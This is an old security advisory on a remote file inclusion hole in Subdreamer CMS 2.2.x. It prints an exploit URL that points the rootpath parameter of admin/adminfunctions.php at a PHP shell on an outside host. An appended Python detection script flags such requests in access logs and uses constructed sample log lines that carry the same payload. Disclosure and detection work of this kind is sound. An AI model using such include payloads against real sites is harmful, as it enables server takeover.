SECURITYVULNS:DOC:11225
Jan 30, 2006 - 12:00 a.m.

Subdreamer CMS (Pro 2.2.3 and Light 2.2.0.1) security bug ;)

Hello world ;)

A serious exploit has recently been discovered which will allow hackers to gain admin access to the
latest versions of Subdreamer CMS (Pro 2.2.3 and Light 2.2.0.1). It is crucial to patch your systems
immediately.

Affected files:
admin/adminfunctions.php
includes/functions.php
includes/globalfunctions.php

=) $rootpath

exploit:
http://target.com/admin/adminfunctions.php?rootpath=http://somesite.com/includes/globalfunctions.php

where "globalfunctions.php" is a php-shell ;)

Vendor info:
http://www.subdreamer.com/forum/showthread.php?p=37279#post37279

All done by JET[CTH] feet B0FH[CTH] ;)
Greets: dm-club, ckt ;)
contact info: [email protected]
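
Added example (not part of the original advisory or of Subdreamer's code): a detection sketch that scans web server access logs for requests to the affected files whose rootpath parameter points at a remote source instead of a local path. It assumes combined-format access logs; the log lines, addresses and .example hosts are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# File paths and parameter name as listed in the advisory.
AFFECTED = ("admin/adminfunctions.php", "includes/functions.php",
            "includes/globalfunctions.php")
PARAM = "rootpath"
# A value starting with a URL scheme/wrapper or a UNC prefix is not a local include root.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]+:|\\\\)", re.I)
# Client, request target and status from a combined-format access log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_unquote(value, rounds=3):
    """Strip up to `rounds` layers of percent-encoding (catches double encoding)."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def check_line(log_line):
    """Return (client, path, status, value) for a remote rootpath request, else None."""
    m = REQUEST.match(log_line)
    if not m:
        return None
    client, target, status = m.groups()
    parts = urlsplit(target)
    path = fully_unquote(parts.path).lower().lstrip("/")
    if not path.endswith(AFFECTED):  # also matches installs in a subdirectory
        return None
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        value = fully_unquote(value)
        if key.lower() == PARAM and REMOTE.match(value):
            return client, "/" + path, int(status), value
    return None

# Constructed sample log lines (documentation addresses and .example hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Jan/2006:10:00:01 +0000] "GET /admin/adminfunctions.php?rootpath=http://somesite.example/includes/globalfunctions.php HTTP/1.1" 200 512',
    '198.51.100.4 - - [30/Jan/2006:10:00:05 +0000] "GET /cms/includes/functions.php?rootpath=ftp%253A%252F%252Fsomesite.example%252F HTTP/1.1" 200 87',
    '192.0.2.10 - - [30/Jan/2006:10:00:09 +0000] "GET /includes/globalfunctions.php?rootpath=./ HTTP/1.1" 200 0',
    '192.0.2.11 - - [30/Jan/2006:10:00:12 +0000] "GET /index.php?categoryid=2 HTTP/1.1" 200 9001',
]

def scan(lines):
    return [hit for hit in map(check_line, lines) if hit]

if __name__ == "__main__":
    for client, path, status, value in scan(SAMPLE_LOG):
        print(f"{client} {path} status={status} rootpath={value}")
```

A hit with a 200 status on an unpatched install is a reason to check the host for unfamiliar PHP files and outbound connections around the logged time.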